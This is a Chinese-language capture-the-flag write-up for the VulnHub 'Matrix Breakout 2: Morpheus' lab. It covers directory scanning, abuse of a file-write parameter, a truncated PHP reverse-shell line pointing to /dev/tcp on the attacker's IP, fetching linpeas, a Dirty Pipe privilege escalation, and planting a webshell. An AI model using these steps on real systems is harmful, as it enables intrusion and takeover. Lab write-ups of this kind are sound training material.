vulnhub靶场渗透实战15-matrix-breakout-2-morpheus

靶机搭建:vulnhub上是说vbox里更合适。可能有vbox版本兼容问题,我用的vmware导入。

 

靶场下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

网络模式:桥接。

 一:信息收集

1:主机发现。端口发现。

2;访问端口信息。三位一体不会玩。

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第1张图片

 3;目录爆破一下,继续寻找。

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第2张图片

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第3张图片

4;文件爆破一下。

ffuf -u http://192.168.1.35/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第4张图片

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第5张图片

 5;输入消息的地方好像有bug。试试。发布的东西被记录到txt文件里了。

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第6张图片

 二:漏洞利用。

1;burp抓包看一下数据包,

这里是一个file变量,改变file变量可以直接对靶机文件修改,能随意创建文件。准备反弹shell。访问创建的文件。

& /dev/tcp/192.168.1.34/8888 0>&1'"); ?>

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第7张图片

 2;监听成功。

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第8张图片

 3;发现一个txt的文件。提示,和一张图片。

www-data@morpheus:/$ ls -al

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第9张图片

 要找到cypher的密码!!

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第10张图片

 4;访问一下图片,把图片复制到kali里面去,可能藏着东西喔。

复制不了的,也可以下载。

wget http://192.168.1.35/.cypher-neo.png

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第11张图片

binwalk -w cypher-neo.png

binwalk -e cypher-neo.png --run-as=root   
换这个工具查看隐藏信息,然后提取出来,然后提示我们加--run-as=root,之后目录下会多个目录,

 zlib这个提取不太会,就换个方式吧!等哪天有大佬从这儿解了,我再来更新学习吧!

杂项 - zlib - Ainsliaea - 博客园

CTF 隐写 关于zlib的解压 2018全国大学生信息安全竞赛 picture_never疯的博客-CSDN博客_ctf zlib文件

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第12张图片

 5:传信息收集的工具上去,

python3 -m http.server 8000
wget http://192.168.1.34:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第13张图片vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第14张图片

 这里我们用这个:mirrors / r1is / CVE-2022-0847 · GitCode

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第15张图片

三:补充。

 到这的话我们就提权成功了,有两个用户名,前面让我们找到cypher的密码,zlib不会提取,试试爆破!家目录下有个flag。

python3 -c 'import pty; pty.spawn("/bin/bash")'  把权限变成交互式shell。

两个用户密码,爆破的话,没爆出来! 

 vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第16张图片

  也可以写个马,连接蚁剑看看文件里面有没有什么信息。

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第17张图片

vulnhub靶场渗透实战15-matrix-breakout-2-morpheus_第18张图片

 四:总结

1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。

2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。

3;遇到不是很懂的程序,投机取巧一下,利用漏洞提权。

你可能感兴趣的:(VulnHub靶场,安全,web安全,mysql,数据库,网络安全)